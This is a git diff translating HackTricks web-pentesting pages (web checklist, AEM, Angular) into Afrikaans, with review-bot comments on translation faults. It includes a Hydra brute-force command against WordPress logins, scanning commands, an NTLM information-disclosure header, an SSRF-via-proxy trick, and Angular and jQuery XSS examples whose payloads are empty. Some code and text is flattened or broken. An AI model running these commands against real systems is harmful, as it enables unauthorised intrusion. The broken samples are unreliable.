-**403 Forbidden/Basic Authentication/401 Unauthorized (bypass)** +**403 Verbode/Grondwetlike Verifikasie/401 Onbevoegd (omseil)** -{% content-ref url="403-and-401-bypasses.md" %} -[403-and-401-bypasses.md](403-and-401-bypasses.md) -{% endcontent-ref %} +{% content-ref url=" +### Web Kwesbaarhede Kontrole -**502 Proxy Error** - -If any page **responds** with that **code**, it's probably a **bad configured proxy**. **If you send a HTTP request like: `GET https://google.com HTTP/1.1`** (with the host header and other common headers), the **proxy** will try to **access** _**google.com**_ **and you will have found a** SSRF. - -**NTLM Authentication - Info disclosure** - -If the running server asking for authentication is **Windows** or you find a login asking for your **credentials** (and asking for **domain** **name**), you can provoke an **information disclosure**.\ -**Send** the **header**: `“Authorization: NTLM TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA=”` and due to how the **NTLM authentication works**, the server will respond with internal info (IIS version, Windows version...) inside the header "WWW-Authenticate".\ -You can **automate** this using the **nmap plugin** "_http-ntlm-info.nse_". - -**HTTP Redirect (CTF)** - -It is possible to **put content** inside a **Redirection**. This content **won't be shown to the user** (as the browser will execute the redirection) but something could be **hidden** in there. - -### Web Vulnerabilities Checking - -Now that a comprehensive enumeration of the web application has been performed it's time to check for a lot of possible vulnerabilities. You can find the checklist here: +Nou dat 'n omvattende opname van die webtoepassing uitgevoer is, is dit tyd om vir baie moontlike kwesbaarhede te kyk. 
Jy kan die lys hier vind: {% content-ref url="../../pentesting-web/web-vulnerabilities-methodology/" %} [web-vulnerabilities-methodology](../../pentesting-web/web-vulnerabilities-methodology/) {% endcontent-ref %} -Find more info about web vulns in: +Vind meer inligting oor web kwesbaarhede by: * [https://six2dez.gitbook.io/pentest-book/others/web-checklist](https://six2dez.gitbook.io/pentest-book/others/web-checklist) * [https://kennel209.gitbooks.io/owasp-testing-guide-v4/content/en/web\_application\_security\_testing/configuration\_and\_deployment\_management\_testing.html](https://kennel209.gitbooks.io/owasp-testing-guide-v4/content/en/web\_application\_security\_testing/configuration\_and\_deployment\_management\_testing.html) * [https://owasp-skf.gitbook.io/asvs-write-ups/kbid-111-client-side-template-injection](https://owasp-skf.gitbook.io/asvs-write-ups/kbid-111-client-side-template-injection) -### Monitor Pages for changes +### Monitor Bladsye vir veranderinge -You can use tools such as [https://github.com/dgtlmoon/changedetection.io](https://github.com/dgtlmoon/changedetection.io) to monitor pages for modifications that might insert vulnerabilities. - -### HackTricks Automatic Commands +Jy kan hulpmiddels soos [https://github.com/dgtlmoon/changedetection.io](https://github.com/dgtlmoon/changedetection.io) gebruik om bladsye te monitor vir wysigings wat moontlik kwesbaarhede kan invoeg. +### HackTricks Outomatiese Opdragte ``` Protocol_Name: Web #Protocol Abbreviation if there is one. Port_Number: 80,443 #Comma separated if there is more than one. 
Protocol_Description: Web #Protocol Abbreviation Spelled out Entry_1: - Name: Notes - Description: Notes for Web - Note: | - https://book.hacktricks.xyz/pentesting/pentesting-web +Name: Notes +Description: Notes for Web +Note: | +https://book.hacktricks.xyz/pentesting/pentesting-web Entry_2: - Name: Quick Web Scan - Description: Nikto and GoBuster - Command: nikto -host {Web_Proto}://{IP}:{Web_Port} &&&& gobuster dir -w {Small_Dirlist} -u {Web_Proto}://{IP}:{Web_Port} && gobuster dir -w {Big_Dirlist} -u {Web_Proto}://{IP}:{Web_Port} +Name: Quick Web Scan +Description: Nikto and GoBuster +Command: nikto -host {Web_Proto}://{IP}:{Web_Port} &&&& gobuster dir -w {Small_Dirlist} -u {Web_Proto}://{IP}:{Web_Port} && gobuster dir -w {Big_Dirlist} -u {Web_Proto}://{IP}:{Web_Port} Entry_3: - Name: Nikto - Description: Basic Site Info via Nikto - Command: nikto -host {Web_Proto}://{IP}:{Web_Port} +Name: Nikto +Description: Basic Site Info via Nikto +Command: nikto -host {Web_Proto}://{IP}:{Web_Port} Entry_4: - Name: WhatWeb - Description: General purpose auto scanner - Command: whatweb -a 4 {IP} +Name: WhatWeb +Description: General purpose auto scanner +Command: whatweb -a 4 {IP} Entry_5: - Name: Directory Brute Force Non-Recursive - Description: Non-Recursive Directory Brute Force - Command: gobuster dir -w {Big_Dirlist} -u {Web_Proto}://{IP}:{Web_Port} +Name: Directory Brute Force Non-Recursive +Description: Non-Recursive Directory Brute Force +Command: gobuster dir -w {Big_Dirlist} -u {Web_Proto}://{IP}:{Web_Port} Entry_6: - Name: Directory Brute Force Recursive - Description: Recursive Directory Brute Force - Command: python3 {Tool_Dir}dirsearch/dirsearch.py -w {Small_Dirlist} -e php,exe,sh,py,html,pl -f -t 20 -u {Web_Proto}://{IP}:{Web_Port} -r 10 +Name: Directory Brute Force Recursive +Description: Recursive Directory Brute Force +Command: python3 {Tool_Dir}dirsearch/dirsearch.py -w {Small_Dirlist} -e php,exe,sh,py,html,pl -f -t 20 -u {Web_Proto}://{IP}:{Web_Port} -r 10 
Entry_7: - Name: Directory Brute Force CGI - Description: Common Gateway Interface Brute Force - Command: gobuster dir -u {Web_Proto}://{IP}:{Web_Port}/ -w /usr/share/seclists/Discovery/Web-Content/CGIs.txt -s 200 +Name: Directory Brute Force CGI +Description: Common Gateway Interface Brute Force +Command: gobuster dir -u {Web_Proto}://{IP}:{Web_Port}/ -w /usr/share/seclists/Discovery/Web-Content/CGIs.txt -s 200 Entry_8: - Name: Nmap Web Vuln Scan - Description: Tailored Nmap Scan for web Vulnerabilities - Command: nmap -vv --reason -Pn -sV -p {Web_Port} --script=`banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)` {IP} +Name: Nmap Web Vuln Scan +Description: Tailored Nmap Scan for web Vulnerabilities +Command: nmap -vv --reason -Pn -sV -p {Web_Port} --script=`banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)` {IP} Entry_9: - Name: Drupal - Description: Drupal Enumeration Notes - Note: | - git clone https://github.com/immunIT/drupwn.git for low hanging fruit and git clone https://github.com/droope/droopescan.git for deeper enumeration +Name: Drupal +Description: Drupal Enumeration Notes +Note: | +git clone https://github.com/immunIT/drupwn.git for low hanging fruit and git clone https://github.com/droope/droopescan.git for deeper enumeration Entry_10: - Name: WordPress - Description: WordPress Enumeration with WPScan - Command: | - ?What is the location of the wp-login.php? Example: /Yeet/cannon/wp-login.php - wpscan --url {Web_Proto}://{IP}{1} --enumerate ap,at,cb,dbe && wpscan --url {Web_Proto}://{IP}{1} --enumerate u,tt,t,vp --passwords {Big_Passwordlist} -e +Name: WordPress +Description: WordPress Enumeration with WPScan +Command: | +?What is the location of the wp-login.php? 
Example: /Yeet/cannon/wp-login.php +wpscan --url {Web_Proto}://{IP}{1} --enumerate ap,at,cb,dbe && wpscan --url {Web_Proto}://{IP}{1} --enumerate u,tt,t,vp --passwords {Big_Passwordlist} -e Entry_11: - Name: WordPress Hydra Brute Force - Description: Need User (admin is default) - Command: hydra -l admin -P {Big_Passwordlist} {IP} -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location' +Name: WordPress Hydra Brute Force +Description: Need User (admin is default) +Command: hydra -l admin -P {Big_Passwordlist} {IP} -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location' Entry_12: - Name: Ffuf Vhost - Description: Simple Scan with Ffuf for discovering additional vhosts - Command: ffuf -w {Subdomain_List}:FUZZ -u {Web_Proto}://{Domain_Name} -H "Host:FUZZ.{Domain_Name}" -c -mc all {Ffuf_Filters} +Name: Ffuf Vhost +Description: Simple Scan with Ffuf for discovering additional vhosts +Command: ffuf -w {Subdomain_List}:FUZZ -u {Web_Proto}://{Domain_Name} -H "Host:FUZZ.{Domain_Name}" -c -mc all {Ffuf_Filters} ``` - \ -**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! +**Foutbounty wenk**: **teken aan** vir **Intigriti**, 'n premium **foutbounty platform geskep deur hackers, vir hackers**! Sluit vandag by ons aan by [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) en begin om belonings te verdien tot **$100,000**! {% embed url="https://go.intigriti.com/hacktricks" %}
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling van eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord groep**](https://discord.gg/hRep4RUj7f) of die [**telegram groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PRs in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
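Review bot: the translated side of this hunk loses content and leaves broken markup in the "403 Forbidden/Basic Authentication/401 Unauthorized" region: the `{% content-ref url="403-and-401-bypasses.md" %}` ... `{% endcontent-ref %}` pair is replaced by a truncated `{% content-ref url="` with no URL and no closing tag, and the "502 Proxy Error", "NTLM Authentication - Info disclosure" and "HTTP Redirect (CTF)" subsections are deleted outright with no Afrikaans replacement; the unclosed GitBook tag will break rendering and the three subsections should be translated, not dropped. In the same heading "Basic Authentication" is rendered as "Grondwetlike Verifikasie" (constitutional), which should be "Basiese Verifikasie". Finally, the "HackTricks Automatic Commands" fenced block is not prose and should stay byte-identical: the hunk strips the two-space indentation under every `Entry_N:` key (for example `Entry_1:` is now followed by `Name: Notes` at column 0), which changes the YAML so the `Name`/`Description`/`Command` keys no longer nest under their entry.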
diff --git a/network-services-pentesting/pentesting-web/aem-adobe-experience-cloud.md b/network-services-pentesting/pentesting-web/aem-adobe-experience-cloud.md index a46bd74ce..0e228599f 100644 --- a/network-services-pentesting/pentesting-web/aem-adobe-experience-cloud.md +++ b/network-services-pentesting/pentesting-web/aem-adobe-experience-cloud.md @@ -1,36 +1,32 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
-Find vulnerabilities and missconfigurations with [https://github.com/0ang3el/aem-hacker](https://github.com/0ang3el/aem-hacker) +Vind kwesbaarhede en verkeerde konfigurasies met [https://github.com/0ang3el/aem-hacker](https://github.com/0ang3el/aem-hacker)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
- - diff --git a/network-services-pentesting/pentesting-web/angular.md b/network-services-pentesting/pentesting-web/angular.md index c22868275..67e0968f2 100644 --- a/network-services-pentesting/pentesting-web/angular.md +++ b/network-services-pentesting/pentesting-web/angular.md 
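Review bot: the header/footer boilerplate in this file is translated differently from the same boilerplate in the pentesting-web README hunk just above ("hacking-truuks" / "PR's" / "GitHub-opslagplekke" here versus "hacktruuks" / "PRs" / "github repos" there, and "Discord-groep" versus "Discord groep"); since every page carries this block, use one fixed Afrikaans string for it across the whole patch so later diffs stay small. The one content line, "Find vulnerabilities and missconfigurations with ...", is translated correctly; the two blank `-` lines removed at the end of the hunk are fine.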
@@ -1,27 +1,26 @@ # Angular -## The Checklist +## Die Kontrolelys -Checklist [from here](https://lsgeurope.com/post/angular-security-checklist). +Kontrolelys [van hier](https://lsgeurope.com/post/angular-security-checklist). -* [ ] Angular is considered a client-side framework and is not expected to provide server-side protection -* [ ] Sourcemap for scripts is disabled in the project configuration -* [ ] Untrusted user input is always interpolated or sanitized before being used in templates -* [ ] The user has no control over server-side or client-side templates -* [ ] Untrusted user input is sanitized using an appropriate security context before being trusted by the application - * [ ] `BypassSecurity*` methods are not used with untrusted input -* [ ] Untrusted user input is not passed to Angular classes such as `ElementRef` , `Renderer2` and `Document`, or other JQuery/DOM sinks +* [ ] Angular word beskou as 'n kliëntkant-raamwerk en daar word nie verwag dat dit bedienerskant-beskerming sal bied nie +* [ ] Sourcemap vir skripte is gedeaktiveer in die projekkonfigurasie +* [ ] Onbetroubare gebruikersinsette word altyd geïnterpoleer of gesaniteer voordat dit in sjablone gebruik word +* [ ] Die gebruiker het geen beheer oor bedienerskant- of kliëntkant-sjablone nie +* [ ] Onbetroubare gebruikersinsette word gesaniteer deur 'n toepaslike sekuriteitskonteks voordat dit deur die toepassing vertrou word +* [ ] `BypassSecurity*`-metodes word nie gebruik met onbetroubare insette nie +* [ ] Onbetroubare gebruikersinsette word nie aan Angular-klasse soos `ElementRef`, `Renderer2` en `Document`, of ander JQuery/DOM-bronne oorgedra nie -## What is Angular +## Wat is Angular -Angular is a **powerful** and **open-source** front-end framework maintained by **Google**. It uses **TypeScript** to enhance code readability and debugging. With strong security mechanisms, Angular prevents common client-side vulnerabilities like **XSS** and **open redirects**. 
It can be used on the **server-side** too, making security considerations important from **both angles**. +Angular is 'n **kragtige** en **open-source** front-end-raamwerk wat deur **Google** onderhou word. Dit gebruik **TypeScript** om koderingsleesbaarheid en foutopsporing te verbeter. Met sterk sekuriteitsmeganismes voorkom Angular algemene kliëntkant-veiligheidskwesbaarhede soos **XSS** en **open omleidings**. Dit kan ook aan die **bedienerskant** gebruik word, wat sekuriteitsoorwegings van **beide kante** belangrik maak. -## Framework architecture +## Raamwerkargitektuur -In order to better understand the Angular basics, let’s go through its essential concepts. - -Common Angular project usually looks like: +Om die basiese konsepte van Angular beter te verstaan, gaan ons deur sy essensiële konsepte. +'n Gewone Angular-projek lyk gewoonlik soos: ```bash my-workspace/ ├── ... #workspace-wide configuration files 
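Review bot: in the checklist, "other JQuery/DOM sinks" is translated as "ander JQuery/DOM-bronne", and "bronne" means sources, which inverts the meaning of the item; keep the term as "sinks" (the rest of the file uses it untranslated). The nested item `* [ ] BypassSecurity* ...` also loses its leading two spaces, so it is no longer a sub-item of the "sanitised using an appropriate security context" check. Two smaller points: "Om die basiese konsepte van Angular beter te verstaan, gaan ons deur sy essensiële konsepte" repeats "konsepte" where the original had "basics" and "concepts", and the blank line before the ```bash fence was removed, which should be restored for consistency with the rest of the file.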
@@ -40,574 +39,559 @@ my-workspace/ ├── angular.json #provides workspace-wide and project-specific configuration defaults └── tsconfig.json #provides the base TypeScript configuration for projects in the workspace ``` +Volgens die dokumentasie het elke Angular-toepassing ten minste een komponent, die hoofkomponent (`AppComponent`), wat 'n komponenthiërargie met die DOM verbind. Elke komponent definieer 'n klas wat toepassingsdata en logika bevat, en word geassosieer met 'n HTML-sjabloon wat 'n aansig definieer wat in 'n teikenomgewing vertoon moet word. Die `@Component()`-versierder identifiseer die klas onmiddellik daaronder as 'n komponent en voorsien die sjabloon en verwante komponentspesifieke metadata. Die `AppComponent` word in die `app.component.ts`-lêer gedefinieer. -According to the documentation, every Angular application has at least one component, the root component (`AppComponent`) that connects a component hierarchy with the DOM. Each component defines a class that contains application data and logic, and is associated with an HTML template that defines a view to be displayed in a target environment. The `@Component()` decorator identifies the class immediately below it as a component, and provides the template and related component-specific metadata. The `AppComponent` is defined in the `app.component.ts` file. +Angular NgModules verklaar 'n samestellingskonteks vir 'n stel komponente wat toegewy is aan 'n toepassingsdomein, 'n werkstroom of 'n nou verwante stel vermoëns. Elke Angular-toepassing het 'n hoofmodule, konvensioneel genaamd `AppModule`, wat die opstartmeganisme verskaf wat die toepassing begin. 'n Toepassing bevat tipies baie funksionele modules. Die `AppModule` word in die `app.module.ts`-lêer gedefinieer. -Angular NgModules declare a compilation context for a set of components that is dedicated to an application domain, a workflow, or a closely related set of capabilities. 
Every Angular application has a root module, conventionally named `AppModule`, which provides the bootstrap mechanism that launches the application. An application typically contains many functional modules. The `AppModule` is defined in the `app.module.ts` file. +Die Angular `Router` NgModule verskaf 'n diens wat jou in staat stel om 'n navigasiepad tussen die verskillende toepassingsstatusse en aanskouingshiërargieë in jou toepassing te definieer. Die `RouterModule` word in die `app-routing.module.ts`-lêer gedefinieer. -The Angular `Router` NgModule provides a service that lets you define a navigation path among the different application states and view hierarchies in your application. The `RouterModule`is defined in the `app-routing.module.ts` file. +Vir data of logika wat nie met 'n spesifieke aansig geassosieer is nie en wat jy wil deel tussen komponente, skep jy 'n diensklas. 'n Diensklasdefinisie word onmiddellik deur die `@Injectable()`-versierder gevolg. Die versierder voorsien die metadata wat dit moontlik maak dat ander verskaffers as afhanklikhede in jou klas ingespuit kan word. Afhanklikheidsinspuiting (DI) stel jou in staat om jou komponentklasse slank en doeltreffend te hou. Hulle haal nie data van die bediener op, valideer gebruikersinsette nie, of log direk na die konsole nie; hulle delegeer sulke take aan dienste. -For data or logic that isn't associated with a specific view, and that you want to share across components, you create a service class. A service class definition is immediately preceded by the `@Injectable()` decorator. The decorator provides the metadata that allows other providers to be injected as dependencies into your class. Dependency injection (DI) lets you keep your component classes lean and efficient. They don't fetch data from the server, validate user input, or log directly to the console; they delegate such tasks to services. 
- -## Sourcemap configuration - -Angular framework translates TypeScript files into JavaScript code by following `tsconfig.json` options and then builds a project with `angular.json` configuration. Looking at `angular.json` file, we observed an option to enable or disable a sourcemap. According to the Angular documentation, the default configuration has a sourcemap file enabled for scripts and is not hidden by default: +## Sourcemap-konfigurasie +Die Angular-raamwerk vertaal TypeScript-lêers na JavaScript-kode deur die `tsconfig.json`-opsies te volg en bou dan 'n projek met die `angular.json`-konfigurasie. Deur na die `angular.json`-lêer te kyk, het ons 'n opsie opgemerk om 'n sourcemap in of uit te skakel. Volgens die Angular-dokumentasie het die verstekkonfigurasie 'n sourcemap-lêer wat ingeskakel is vir skripte en nie standaard versteek is nie: ```json "sourceMap": { - "scripts": true, - "styles": true, - "vendor": false, - "hidden": false +"scripts": true, +"styles": true, +"vendor": false, +"hidden": false } ``` - -Generally, sourcemap files are utilized for debugging purposes as they map generated files to their original files. Therefore, it is not recommended to use them in a production environment. If sourcemaps are enabled, it improves the readability and aids in file analysis by replicating the original state of the Angular project. However, if they are disabled, a reviewer can still analyze a compiled JavaScript file manually by searching for anti-security patterns. - -Furthemore, a compiled JavaScript file with an Angular project can be found in the browser developer tools → Sources (or Debugger and Sources) → \[id].main.js. Depending on the enabled options, this file may contain the following row in the end `//# sourceMappingURL=[id].main.js.map` or it may not, if the **hidden** option is set to **true**. Nonetheless, if the sourcemap is disabled for **scripts**, testing becomes more complex, and we cannot obtain the file. 
In addition, sourcemap can be enabled during project build like `ng build --source-map`. - ## Data binding -Binding refers to the process of communication between a component and its corresponding view. It is utilized for transferring data to and from the Angular framework. Data can be passed through various means, such as through events, interpolation, properties, or through the two-way binding mechanism. Moreover, data can also be shared between related components (parent-child relation) and between two unrelated components using the Service feature. +Binding verwys na die proses van kommunikasie tussen 'n komponent en sy ooreenstemmende weergawe. Dit word gebruik om data oor te dra na en van die Angular-raamwerk. Data kan deur verskillende middels oorgedra word, soos deur gebeure, interpolasie, eienskappe, of deur die tweerigtingbinding meganisme. Verder kan data ook gedeel word tussen verwante komponente (ouer-kind verhouding) en tussen twee onverwante komponente deur die gebruik van die Diens-funksie. -We can classify binding by data flow: +Ons kan binding klassifiseer volgens die data-vloei: -* Data source to view target (includes _interpolation_, _properties_, _attributes_, _classes_ and _styles_); can be applied by using `[]` or `{{}}` in template; -* View target to data source (includes _events_); can be applied by using `()` in template; -* Two-Way; can be applied by using `[()]` in template. +* Data-bron na weergawe-teiken (sluit interpolasie, eienskappe, eienskappe, klasse en style in); kan toegepas word deur `[]` of `{{}}` in die sjabloon te gebruik; +* Weergawe-teiken na data-bron (sluit gebeure in); kan toegepas word deur `()` in die sjabloon te gebruik; +* Tweerigting; kan toegepas word deur `[()]` in die sjabloon te gebruik. 
-Binding can be called on properties, events, and attributes, as well as on any public member of a source directive: +Binding kan toegepas word op eienskappe, gebeure en eienskappe, sowel as op enige openbare lid van 'n bronrigting: -| TYPE | TARGET | EXAMPLES | +| SOORT | TEIKEN | VOORBEELDE | | --------- | -------------------------------------------------------- | -------------------------------------------------------------------- | -| Property | Element property, Component property, Directive property | \ | -| Event | Element event, Component event, Directive event | \ - ``` -* To set the property of a DOM element, you can use `Renderer2.setProperty()` method and trigger an XSS attack: +//app.component.html + + +``` +* Om die eienskap van 'n DOM-element in te stel, kan jy die `Renderer2.setProperty()` metode gebruik en 'n XSS-aanval veroorsaak: - ```tsx - //app.component.ts - import {Component, Renderer2, ElementRef, ViewChild, AfterViewInit } from '@angular/core'; +```tsx +//app.component.ts +import {Component, Renderer2, ElementRef, ViewChild, AfterViewInit } from '@angular/core'; - @Component({ - selector: 'app-root', - templateUrl: './app.component.html', - styleUrls: ['./app.component.css'] - }) - export class AppComponent { - - public constructor ( - private renderer2: Renderer2 - ){} - @ViewChild("img") img!: ElementRef; +@Component({ +selector: 'app-root', +templateUrl: './app.component.html', +styleUrls: ['./app.component.css'] +}) +export class AppComponent { - setProperty(){ - this.renderer2.setProperty(this.img.nativeElement, 'innerHTML', ''); - } - } +public constructor ( +private renderer2: Renderer2 +){} +@ViewChild("img") img!: ElementRef; - //app.component.html - - - ``` +setProperty(){ +this.renderer2.setProperty(this.img.nativeElement, 'innerHTML', ''); +} +} -During our research, we also examined the behavior of other `Renderer2` methods, such as `setStyle()`, `createComment()`, and `setValue()`, in relation to XSS and CSS injections. 
However, we were unable to find any valid attack vectors for these methods due to their functional limitations. +//app.component.html + + +``` + +Tydens ons navorsing het ons ook die gedrag van ander `Renderer2` metodes, soos `setStyle()`, `createComment()` en `setValue()`, in verband met XSS- en CSS-injeksies ondersoek. Ons kon egter geen geldige aanvalsvektore vir hierdie metodes vind as gevolg van hul funksionele beperkings nie. #### jQuery -jQuery is a fast, small, and feature-rich JavaScript library that can be used in the Angular project to help with manipulation the HTML DOM objects. However, as it is known, this library’s methods may be exploited to achieve an XSS vulnerability. In order to discuss how some vulnerable jQuery methods can be exploited in Angular projects, we added this subsection. +jQuery is 'n vinnige, klein en funksierike JavaScript-biblioteek wat in die Angular-projek gebruik kan word om te help met die manipulasie van die HTML DOM-voorwerpe. Dit is egter bekend dat hierdie biblioteek se metodes uitgebuit kan word om 'n XSS-kwesbaarheid te bereik. Om te bespreek hoe sommige kwesbare jQuery-metodes in Angular-projekte uitgebuit kan word, het ons hierdie subafdeling bygevoeg. -* The `html()` method gets the HTML contents of the first element in the set of matched elements or sets the HTML contents of every matched element. However, by design, any jQuery constructor or method that accepts an HTML string can potentially execute code. This can occur by injection of `"); - }); - } - } +@Component({ +selector: 'app-root', +templateUrl: './app.component.html', +styleUrls: ['./app.component.css'] +}) +export class AppComponent implements OnInit +{ +ngOnInit() +{ +$("button").on("click", function() +{ +$("p").html(""); +}); +} +} - //app.component.html - -

some text here

- ``` -* The `jQuery.parseHTML()` method uses native methods to convert the string to a set of DOM nodes, which can then be inserted into the document. +//app.component.html + +

iets teks hier

+``` +* Die `jQuery.parseHTML()` metode gebruik inheemse metodes om die string na 'n stel DOM-node om te skakel, wat dan in die dokument ingevoeg kan word. - ```tsx - jQuery.parseHTML(data [, context ] [, keepScripts ]) - ``` +```tsx +jQuery.parseHTML(data [, context ] [, keepScripts ]) +``` - As mentioned before, most jQuery APIs that accept HTML strings will run scripts that are included in the HTML. The `jQuery.parseHTML()` method does not run scripts in the parsed HTML unless `keepScripts` is explicitly `true`. However, it is still possible in most environments to execute scripts indirectly; for example, via the `` attribute. +Soos voorheen genoem, sal die meeste jQuery-API's wat HTML-strings aanvaar, skripte uitvoer wat in die HTML ingesluit is. Die `jQuery.parseHTML()` metode voer nie skripte in die geparseerde HTML uit tensy `keepScripts` uitdruklik `true` is nie. Dit is egter steeds moontlik om in die meeste omgewings skripte indirek uit te voer; byvoorbeeld via die ``-eienheid. - ```tsx - //app.component.ts - import { Component, OnInit } from '@angular/core'; - import * as $ from 'jquery'; +```tsx +//app.component.ts +import { Component, OnInit } from '@angular/core'; +import * as $ from 'jquery'; - @Component({ - selector: 'app-root', - templateUrl: './app.component.html', - styleUrls: ['./app.component.css'] - }) - export class AppComponent implements OnInit - { - ngOnInit() - { - $("button").on("click", function() - { - var $palias = $("#palias"), - str = "", - html = $.parseHTML(str), - nodeNames = []; - $palias.append(html); - }); - } - } +@Component({ +selector: 'app-root', +templateUrl: './app.component.html', +styleUrls: ['./app.component.css'] +}) +export class AppComponent implements OnInit +{ +ngOnInit() +{ +$("button").on("click", function() +{ +var $palias = $("#palias"), +str = "", +html = $.parseHTML(str), +nodeNames = []; +$palias.append(html); +}); +} +} - //app.component.html - -

some text

- ``` +//app.component.html + +

iets teks

+``` -### Open redirects +### Oop omleidings -#### DOM interfaces +#### DOM-koppelvlakke -According to the W3C documentation, the `window.location` and `document.location` objects are treated as aliases in modern browsers. That is why they have similar implementation of some methods and properties, which might cause an open redirect and DOM XSS with `javascript://` schema attacks as mentioned below. +Volgens die W3C-dokumentasie word die `window.location` en `document.location` voorwerpe as aliase in moderne webblaaier behandel. Dit is waarom hulle soortgelyke implementering van sommige metodes en eienskappe het, wat 'n oop omleiding en DOM XSS met `javascript://`-skema-aanvalle kan veroorsaak, soos hieronder genoem. -* `window.location.href`(and `document.location.href`) +* `window.location.href`(en `document.location.href`) - The canonical way to get the current DOM location object is using `window.location`. It can also be used to redirect the browser to a new page. As a result, having control over this object allows us to exploit an open redirect vulnerability. +Die kanonieke manier om die huidige DOM-plekvoorwerp te kry, is deur `window.location` te 